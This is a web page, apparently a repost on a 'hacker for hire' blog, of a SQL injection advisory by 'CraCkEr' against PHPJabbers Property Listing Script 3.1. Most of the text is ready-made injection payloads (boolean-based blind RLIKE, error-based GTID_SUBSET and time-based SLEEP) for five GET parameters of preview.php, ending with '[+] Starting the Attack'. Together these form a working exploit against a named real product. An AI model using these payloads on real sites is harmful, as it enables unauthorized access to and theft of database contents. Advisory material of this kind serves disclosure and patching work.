PHPJabbers Property Listing Script 3.1 SQL Injection ≈ Mobile Hacker For Hire

#1 Mobile Hacker For Hire > Blog > Uncategorized > PHPJabbers Property Listing Script 3.1 SQL Injection ≈ Mobile Hacker For Hire

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack…. ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : PHPJabbers.com │
│ Vendor : PHPJabbers │
│ Software : PHPJabbers Property Listing Script 3.1 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company’s reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: preview.php

/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33

GET parameter ‘feature_id’ is vulnerable to SQLI

—
Parameter: feature_id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1′ RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND ‘NbjG’=’NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1′ AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND ‘iWla’=’iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1′ AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND ‘UOAT’=’UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33
—

GET parameter ‘min_bedrooms’ is vulnerable to SQLI

—
Parameter: min_bedrooms (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))– HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)– bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)– zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33
—

GET parameter ‘max_bedrooms’ is vulnerable to SQLI

—
Parameter: max_bedrooms (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))– gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)– jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)– cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33
—

GET parameter ‘min_bathrooms’ is vulnerable to SQLI

—
Parameter: min_bathrooms (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))– lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)– OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)– mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33
—

GET parameter ‘max_bathrooms’ is vulnerable to SQLI

—
Parameter: max_bathrooms (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))– GPVf&min_floor_area=11&max_floor_area=33

Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)– hFHq&min_floor_area=11&max_floor_area=33

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)– IvPE&min_floor_area=11&max_floor_area=33
—

[+] Starting the Attack

[-] Done

PHPJabbers Property Listing Script 3.1 SQL Injection ≈ Mobile Hacker For Hire

Table of Contents

Leave a Reply Cancel reply

Useful Links

Subscribe Now

PHPJabbers Property Listing Script 3.1 SQL Injection ≈ Mobile Hacker For Hire

Table of Contents

Leave a Reply Cancel reply

Related Post

Useful Links

Subscribe Now